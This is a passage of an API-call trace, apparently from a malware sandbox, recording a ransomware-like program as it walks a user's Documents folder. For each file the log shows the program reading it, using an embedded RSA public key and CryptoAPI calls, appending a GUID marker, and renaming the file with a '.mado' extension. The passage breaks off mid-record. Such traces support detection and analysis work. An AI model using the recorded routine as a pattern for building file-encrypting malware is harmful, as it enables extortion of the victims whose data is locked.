(hProv=0x3219e0, dwFlags=0x0) returned 1 [0203.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.986] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.986] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.986] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x19d0) returned 0x3b70b68 [0203.986] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.986] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c6a8 [0203.986] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x19cd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.986] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0203.987] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.987] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.987] CloseHandle (hObject=0x63c) returned 1 [0203.987] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4DZkt_Zg.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4dzkt_zg.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4DZkt_Zg.csv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4dzkt_zg.csv.mado")) returned 1 [0203.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b70b68 | out: hHeap=0x2c0000) returned 1 [0203.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.988] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0203.989] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3964e90, ftCreationTime.dwHighDateTime=0x1d5a71d, ftLastAccessTime.dwLowDateTime=0x5e7f3580, ftLastAccessTime.dwHighDateTime=0x1d58731, ftLastWriteTime.dwLowDateTime=0x5e7f3580, ftLastWriteTime.dwHighDateTime=0x1d58731, nFileSizeHigh=0x0, nFileSizeLow=0x6f86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4vPNQhxvPxw2Jt5YMeW.docx", cAlternateFileName="4VPNQH~1.DOC")) returned 1 [0203.989] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4vPNQhxvPxw2Jt5YMeW.docx") returned=".docx" [0203.989] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4vPNQhxvPxw2Jt5YMeW.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4vpnqhxvpxw2jt5ymew.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.990] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=28550) returned 1 [0203.990] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.992] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x6f60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.992] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.994] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x6f86, lpOverlapped=0x0) returned 1 [0203.995] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.995] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.995] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.995] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0203.996] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.996] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.996] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.996] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.996] GetLastError () returned 0x0 [0203.996] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.996] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0203.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.996] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.996] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.996] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x6f90) returned 0x3b70b68 [0203.996] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.996] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c6a8 [0203.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b77b00 [0203.997] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x6f86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.997] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.997] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.997] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.997] CloseHandle (hObject=0x63c) returned 1 [0203.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeff8 [0203.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b70b68 [0203.998] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4vPNQhxvPxw2Jt5YMeW.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4vpnqhxvpxw2jt5ymew.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4vPNQhxvPxw2Jt5YMeW.docx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4vpnqhxvpxw2jt5ymew.docx.mado")) returned 1 [0203.999] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c276f20, ftCreationTime.dwHighDateTime=0x1d5da6f, ftLastAccessTime.dwLowDateTime=0x5d41eef0, ftLastAccessTime.dwHighDateTime=0x1d5e254, ftLastWriteTime.dwLowDateTime=0x5d41eef0, ftLastWriteTime.dwHighDateTime=0x1d5e254, nFileSizeHigh=0x0, nFileSizeLow=0xa3ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5MP3.doc", cAlternateFileName="")) returned 1 [0204.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0204.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0204.000] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5MP3.doc") returned=".doc" [0204.000] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5MP3.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5mp3.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.001] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=41964) returned 1 [0204.001] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.003] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa3c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.003] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.004] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xa3ec, lpOverlapped=0x0) returned 1 [0204.005] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0204.005] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.005] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.005] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0204.006] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.006] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.006] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.007] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.007] GetLastError () returned 0x0 [0204.007] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.007] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0204.007] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.007] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.007] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.007] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c6a8 [0204.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7af60 [0204.007] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa3ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.008] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.008] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.008] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.008] CloseHandle (hObject=0x63c) returned 1 [0204.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3b70b68 [0204.009] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5MP3.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5mp3.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5MP3.doc.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5mp3.doc.mado")) returned 1 [0204.011] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x283de860, ftCreationTime.dwHighDateTime=0x1d5d112, ftLastAccessTime.dwLowDateTime=0xc8436b20, ftLastAccessTime.dwHighDateTime=0x1d5ac8f, ftLastWriteTime.dwLowDateTime=0xc8436b20, ftLastWriteTime.dwHighDateTime=0x1d5ac8f, nFileSizeHigh=0x0, nFileSizeLow=0x11ccb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bDCJecVJFUpJJKq-L.pptx", cAlternateFileName="BDCJEC~1.PPT")) returned 1 [0204.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0204.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0204.011] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bDCJecVJFUpJJKq-L.pptx") returned=".pptx" [0204.011] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bDCJecVJFUpJJKq-L.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bdcjecvjfupjjkq-l.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.012] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=72907) returned 1 [0204.012] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.014] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x11ca5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.014] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.015] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x11ccb, lpOverlapped=0x0) returned 1 [0204.016] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0204.016] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.016] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.016] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0204.017] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.017] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.017] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.017] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.017] GetLastError () returned 0x0 [0204.017] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.017] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0204.017] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.017] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.018] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.018] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c6a8 [0204.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b70b68 [0204.018] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x11ccb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.018] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.019] lstrlenA 